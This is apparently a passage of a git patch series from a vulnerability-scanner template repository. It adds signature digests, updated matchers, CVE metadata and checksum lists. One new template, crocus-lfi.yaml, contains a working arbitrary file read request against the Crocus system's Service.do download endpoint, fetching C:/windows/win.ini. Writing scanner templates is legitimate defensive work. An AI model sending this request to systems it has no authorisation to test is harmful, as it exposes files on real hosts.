b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..69787d486b 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220290b9e23706e6a64afe85b637db82c8b2d9a8094c1b1f3f38e2d37e7fe9184a4022100bff080f6171118a2e30e0bdfdde18b23a20c96d578350f4c5a70dd4be930e3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..1729520b74 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206d97023531e2d1f6ab7c3693bf66323c8167a47e123545d09e8d1e45c6a1a86202206562c69b3fe242ed1095edd36f6900b88acb5f249c2308ac6d2ae238d83d80c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..cf02deacde 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205bb947a37abf0235e445b1775e4d6fef46be781a7dba28a61aad5f6e80cf6392022100cae801ec5e29c1efcfc539d63258e65d07098db7ca2de4af6ceb572bb9a504e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..47eff78bc6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5c3eec92ac7cfdbefef936c0d95a0378c99682d5df58477b9e6985095a5ca660221009c7634c9abeb6b4da2172cbf24ef2a3d6c26894baf8a7bb3fbc9435a5fd3e722:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..540cd044f4 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e67be24035856efd3d42000f9d261130b6466f38c62b29647d37844337d8530022100c668e4fb2fec1f72c8f853cee809e9dec4ce8a912c028ee6fb7cf773d8e7157a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..67f6cf7151 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac42bd4327bf8873cedad6a5087c5a5b3edbefc9b0f72ccf75a3f1a6d1ae836f022011c3504564cdfbdd9050e9757376b9da866c55004379fca3a26b3b8b68ed8a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..964f37043e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b40f63e2a31960f7157a3cc63fe2ff464b78d143a7283582145941d8294857450220551eb408b51a99671f4de17f59d8ea0e7ecdd7aea7e607fbca73ff01f1a9ca2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..e72ef42ec7 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025eea9a9405123851d972dde43fbdc677d4d77a5fad5c8dc7aad22d3c1a920e0022100b6774bc1f224d40dddaad92d4f22b7f7865af0af2a7a6bc612636ab6475b72a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bf2160b48b4d91a83d0de0b668b503e9f77c32e3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:17:56 +0530 Subject: [PATCH 0854/1841] updated macthers& info --- .../configs/apache-pinot-config.yaml | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/http/exposures/configs/apache-pinot-config.yaml b/http/exposures/configs/apache-pinot-config.yaml index 1f68234267..0003226a8e 100644 --- a/http/exposures/configs/apache-pinot-config.yaml +++ b/http/exposures/configs/apache-pinot-config.yaml @@ -10,9 +10,11 @@ info: cpe: cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:* metadata: max-request: 1 + verified: true vendor: apache product: pinot - tags: config,exposed,pinot,apache + shodan-query: title:"Apache Pinot" + tags: config,exposure,pinot,apache http: - method: GET @@ -22,19 +24,18 @@ http: matchers-condition: and matchers: - type: word + part: body words: - - 'systemConfig' - - 'runtimeConfig' - - 'pinotConfig' - - 'jvmConfig' - - 'systemProperties' + - '"systemConfig"' + - '"pinotConfig"' + - '"jvmConfig"' condition: and + + - type: word + part: header + words: + - 'application/json' + - type: status status: - 200 - extractors: - - type: json - name: config - part: body - json: - - '.[].systemProperties."basedir",.[].systemProperties."user.home",.[].systemProperties."user.name",.[].systemProperties."user.dir",.[].systemProperties."app.home",.[].systemProperties."java.home",.[].systemProperties."java.runtime.version",.systemConfig.name,.[].systemProperties."os.version"' From 926fa8c1be97707198b15847e458f60f887e0270 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:20:45 +0530 Subject: [PATCH 0855/1841] Create crocus-lfi.yaml --- http/vulnerabilities/other/crocus-lfi.yaml | 36 ++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/other/crocus-lfi.yaml diff --git a/http/vulnerabilities/other/crocus-lfi.yaml b/http/vulnerabilities/other/crocus-lfi.yaml new file mode 100644 index 0000000000..a9df36dcdf --- /dev/null +++ b/http/vulnerabilities/other/crocus-lfi.yaml @@ -0,0 +1,36 @@ +id: crocus-lfi + +info: + name: Crocus system Service.do - Arbitrary File Read + author: pussycat0x + severity: high + description: | + This template detects the ability to download the win.ini file from the Windows directory by exploiting a file download vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AFCrocus%E7%B3%BB%E7%BB%9FService.do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: body="/ThirdResource/respond/respond.min.js" && title="Crocus" + tags: crocus,lfi + +http: + - raw: + - | + GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 From f3d9228e3e57734dffc1d898e4de4d69dd834857 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:21:58 +0530 Subject: [PATCH 0856/1841] Update apache-pinot-detect.yaml --- http/technologies/apache/apache-pinot-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/technologies/apache/apache-pinot-detect.yaml b/http/technologies/apache/apache-pinot-detect.yaml index 41c6dd2dd6..74af8dd8aa 100644 --- a/http/technologies/apache/apache-pinot-detect.yaml +++ b/http/technologies/apache/apache-pinot-detect.yaml @@ -10,8 +10,10 @@ info: cpe: cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:* metadata: max-request: 1 + verified: true vendor: apache product: pinot + shodan-query: title:"Apache Pinot" tags: tech,pinot,apache,detect http: @@ -24,8 +26,7 @@ http: - type: word words: - 'Apache Pinot' - - 'Pinot Controller UI' - condition: and + - type: status status: - 200 From d490ab963207fbd658ebb5bba2c1d98a451efdd3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:27:59 +0530 Subject: [PATCH 0857/1841] Update CVE-2024-33605.yaml --- http/cves/2024/CVE-2024-33605.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-33605.yaml b/http/cves/2024/CVE-2024-33605.yaml index 0993a6271f..806a09453d 100644 --- a/http/cves/2024/CVE-2024-33605.yaml +++ b/http/cves/2024/CVE-2024-33605.yaml @@ -1,12 +1,13 @@ id: CVE-2024-33605 info: - name: Sharp Multifunction Printers - Arbitrary Directory Listing without authentication + name: Sharp Multifunction Printers - Directory Listing author: gy741 severity: high description: | It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file. - remediation: Apply all relevant security patches and product upgrades. + remediation: | + Apply all relevant security patches and product upgrades. reference: - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-arbitrary-directory-listing - https://jvn.jp/en/vu/JVNVU93051062/index.html From 24872135f4da4c7261c21d17811575f3800f55f0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 08:03:12 +0000 Subject: [PATCH 0858/1841] Auto Generated New Template Addition List [Thu Jul 4 08:03:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cdaa191333..795927c369 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml http/cves/2024/CVE-2024-32709.yaml +http/cves/2024/CVE-2024-33605.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml From 8f889a9e153c94337c2e16661dce0df76f73d78a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 08:03:18 +0000 Subject: [PATCH 0859/1841] Auto Generated Templates Checksum [Thu Jul 4 08:03:18 UTC 2024] :robot: --- templates-checksum.txt | 408 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 11acdc2675..bec1555d46 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -234,6 +234,7 @@ dast/vulnerabilities/cmdi/ruby-open-rce.yaml:89c6935b600f5037198944b00841ae4e650 dast/vulnerabilities/crlf/cookie-injection.yaml:47b5859ec897917dcc633dee9d83454b203d2ab8 dast/vulnerabilities/crlf/crlf-injection.yaml:b2a16bd3436b9429d72d4f929ab55ad5ee880a91 dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28f4ec95a4d09add80ffff07e7a8f71d +dast/vulnerabilities/injection/csv-injection.yaml:8823eb03c6d5f1913c4927076f9f7cb71f2d0667 dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9f452e835936f370 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 @@ -3447,6 +3448,7 @@ http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 +http/cves/2024/CVE-2024-33605.yaml:449f7ffd28c4a49acb7bb0c898c90ef99b096de4 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b @@ -5533,7 +5535,7 @@ http/misconfiguration/express-stack-trace.yaml:5d6a09415331603b6718bb7b766f90606 http/misconfiguration/feiyuxing-info-leak.yaml:8283a5c83d32a5290bfb243fa629e47e8aecdadf http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092ccc61ff http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 -http/misconfiguration/forgejo-repo-exposure.yaml:414624d596a24b8e02be991c5a00bd859697624f +http/misconfiguration/forgejo-repo-exposure.yaml:5e8b5c8ac2a835f9df1ccbd28130794c7f744fd8 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc @@ -5687,7 +5689,7 @@ http/misconfiguration/installer/phpgedview-installer.yaml:c3abf51106828355409764 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 -http/misconfiguration/installer/piwigo-installer.yaml:8c8cffddb176c1233eac80628ba8a3c5967ee73a +http/misconfiguration/installer/piwigo-installer.yaml:545259e01f02d7c7a705e1fc31771e50f75e991c http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 http/misconfiguration/installer/poste-io-installer.yaml:6c3bbd9a9921a652911b49917071d448b427e2ad @@ -7240,228 +7242,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:2271ec3dda6fe6239eb207abf753acf6004e6303 +http/technologies/wordpress/plugins/add-to-any.yaml:38060c2bbcf21f46edcb8d2b3e9dacf9a60be07c +http/technologies/wordpress/plugins/admin-menu-editor.yaml:c611e5db9315e7299a5467f885a5fee0c9a78e2a http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:64615791edcbf699fbdaf77d76b447aece4f8d1d +http/technologies/wordpress/plugins/akismet.yaml:5e601025cc174359b17c906bdbceb771ed484bc4 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:7cf0219bc17e533a6fb9605de083299f8c110a6d +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:cbf464e28b85e0b355a230de385cc285c9d4190f +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:7698cdae22e8514f41dafbcf7f77d0dad6e35da5 +http/technologies/wordpress/plugins/amp.yaml:5d7087de0432335ac402b3498ffe263ba9ea76c5 +http/technologies/wordpress/plugins/antispam-bee.yaml:dbfb0b14e2893f5ab64273c8252a712f96ad03b2 +http/technologies/wordpress/plugins/astra-sites.yaml:50607cb5484ec3e033f6e229b55eaa666fb34225 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:22dff49563180708f7e8b16f9173b7ca4fd0db4f +http/technologies/wordpress/plugins/backwpup.yaml:1d0b3ef6d2d20312a118969c338e0e2ed0a4b616 +http/technologies/wordpress/plugins/better-search-replace.yaml:69907f7e632dc37e23819da2f40c6b1a7ba10214 +http/technologies/wordpress/plugins/better-wp-security.yaml:7c0ee349835e70143f53d910e9e45c7e8f9c92eb +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:6d5b82507be8aaeae251bd091a84702a46151bf3 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:cb6105fa82ac9a765767e0eb88e659fa7d9381ea +http/technologies/wordpress/plugins/breeze.yaml:023ea414e02ba8170a7e3a939444cbd74c750ef0 +http/technologies/wordpress/plugins/broken-link-checker.yaml:9e752d540cf3e4a04d9a144293fc0bf9a38f3b91 +http/technologies/wordpress/plugins/chaty.yaml:94b7c00479b0eac1bc1b06b7376bc58259e83903 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:7a2c91b776638fc49545628cc58c7a8494a2b478 +http/technologies/wordpress/plugins/classic-editor.yaml:6301dda2b99f764c078b71961a81e2c0d283b173 +http/technologies/wordpress/plugins/classic-widgets.yaml:d8e19aa8a0f5e15f12ab876e2b988a803821805b +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e9be5e77dff45b509573005bd2debb4b228be9d5 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:7bf40c52b1760e81a9bd4eeb4dbf3aa718b04892 +http/technologies/wordpress/plugins/coblocks.yaml:4ce773454b48fdbc2e711e778e33c4dd3e67b0c1 +http/technologies/wordpress/plugins/code-snippets.yaml:24f1a6debda3a2d5eb9440915e5c3b6ad144ffe6 +http/technologies/wordpress/plugins/coming-soon.yaml:9f7892e54c72f6fa762e4cee5a9e76575bd4534b +http/technologies/wordpress/plugins/complianz-gdpr.yaml:d582294881c1d0b8c3359c75998165751006a4a5 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7c0b8e90ff696870371f9ff88afb7fc14580f6a9 +http/technologies/wordpress/plugins/contact-form-7.yaml:9a280e3db9ed1d513b79c0aa0cb9f0932edb0196 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:171514cf08af0c9f3ef90eab821df788e459a5dd +http/technologies/wordpress/plugins/cookie-law-info.yaml:062409a7c3583aeebf2306640938cd797cec0815 +http/technologies/wordpress/plugins/cookie-notice.yaml:7ff6a86447f98a7023a6738e4ba3d3bca61ee4fc +http/technologies/wordpress/plugins/copy-delete-posts.yaml:123e8e828368eb51adf35eab0b0ad0d158f81942 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:ac3d6dbc46df91bdb856878f428cce4513bfcb6e +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2990cec997a7de14959d4b945bc621641ebfa883 +http/technologies/wordpress/plugins/custom-css-js.yaml:2ba876aac1937a2e94bfa4ee71a4f91545061f7d +http/technologies/wordpress/plugins/custom-fonts.yaml:d615cfbae95528c774d1bc469de5a490459e71ad +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:74ee7e9132bc7746d42b509f30b016b2327ca689 +http/technologies/wordpress/plugins/disable-comments.yaml:9c41175dc690bfed447b6637deb3a48c026af27c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:fd0075805e4a3143c652c60eee70d15d9c309c06 +http/technologies/wordpress/plugins/duplicate-page.yaml:1199dbaedcea6ac80fbdabe9b9b5114f4066ab78 +http/technologies/wordpress/plugins/duplicate-post.yaml:c996c71485d186f9e8129ab83009314f5741f0b6 +http/technologies/wordpress/plugins/duplicator.yaml:b9106de542bf90afb099711ba5eeecb90a56b657 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:2ef90bf8414dac9b0029d77babe250b5feb0365c http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:645c93a0e661c53cfdade6e8603299fa9df39dec +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7e8f33b53ec52f77b66034718be4b920c2e69f5c +http/technologies/wordpress/plugins/elementor.yaml:6bf9980729df79f5f930b36464d46ac48fae628e 